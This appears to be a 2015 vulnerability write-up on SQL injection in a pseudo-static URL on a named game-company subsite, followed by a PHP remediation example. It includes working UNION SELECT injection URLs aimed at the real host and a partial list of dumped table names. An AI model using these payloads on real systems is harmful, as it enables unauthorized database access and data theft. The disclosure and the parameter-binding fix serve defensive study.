
Pseudo-static URL SQL injection on a Giant subsite, and the fix - Website Security

Source: 自学PHP网    Time: 2015-04-17 14:47


All databases

Proof of vulnerability: http://club.kok3.ztgame.com/index.php/Index/showGong/id/-516 UNION SELECT 1,2,3,4,database(),6,7,group_concat(schema_name),9,10,11,@@version,13 from information_schema.schemata
Tables in the current database
http://club.kok3.ztgame.com/index.php/Index/showGong/id/-516 UNION SELECT 1,2,3,4,database(),6,7,group_concat(table_name),9,10,11,@@version,13 from information_schema.tables where table_schema=database()

think_album,
think_album_qun,
think_app,
think_attach,
think_blog,
think_boss,
think_chat,
think_code,
think_comment,
think_doing,
think_email,
think_file_group,
think_game,
think_gift,
think_gift_category,
think_gong,
think_gong_ding,
think_group,
think_group_member,
think_hello,
think_image,
think_jiazu,
think_koc,
think_love,
think_magic,
think_material,
think_m
Fix: apply appropriate filtering to the submitted parameters.
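
One way to apply that fix to a pseudo-static `id` segment, as an added example that is not code from the original report or from the affected site. The function names, the `title` column and the sample row are assumptions; only the `/Index/showGong/id/...` URL shape and the `think_gong` table name come from the page.

```php
<?php
// Added example: helper names, the "title" column and the sample row are constructed.

// Split a pseudo-static PATH_INFO such as "/Index/showGong/id/516" into
// key/value pairs that follow the controller and action segments.
function pathinfo_params(string $pathInfo): array
{
    $seg = array_values(array_filter(
        explode('/', rawurldecode($pathInfo)),
        fn($s) => $s !== ''
    ));
    $params = [];
    for ($i = 2; $i + 1 < count($seg); $i += 2) {
        $params[$seg[$i]] = $seg[$i + 1];
    }
    return $params;
}

// Hardened lookup. The vulnerable pattern would concatenate $params['id']
// straight into the SQL string; here the value must pass a strict integer
// check and is then sent as a bound parameter, never as SQL text.
function show_gong(PDO $db, string $pathInfo): ?array
{
    $raw = pathinfo_params($pathInfo)['id'] ?? '';
    // Only 1 to 9 ASCII digits: no sign, whitespace, commas or keywords.
    if (!preg_match('/\A[1-9][0-9]{0,8}\z/', $raw)) {
        return null; // caller should answer with 400 or 404
    }
    $stmt = $db->prepare('SELECT id, title FROM think_gong WHERE id = :id');
    $stmt->bindValue(':id', (int) $raw, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed in-memory data so the example runs offline (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE think_gong (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO think_gong VALUES (516, 'sample post')");

// A well-formed id returns the row; a segment shaped like the report's
// proof-of-vulnerability value (shortened here) is rejected before any query.
var_dump(show_gong($db, '/Index/showGong/id/516'));
var_dump(show_gong($db, '/Index/showGong/id/-516 UNION SELECT 1,2,3'));
```

Pseudo-static path segments reach the application as ordinary user input, so they need the same validation and parameter binding as query-string values.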
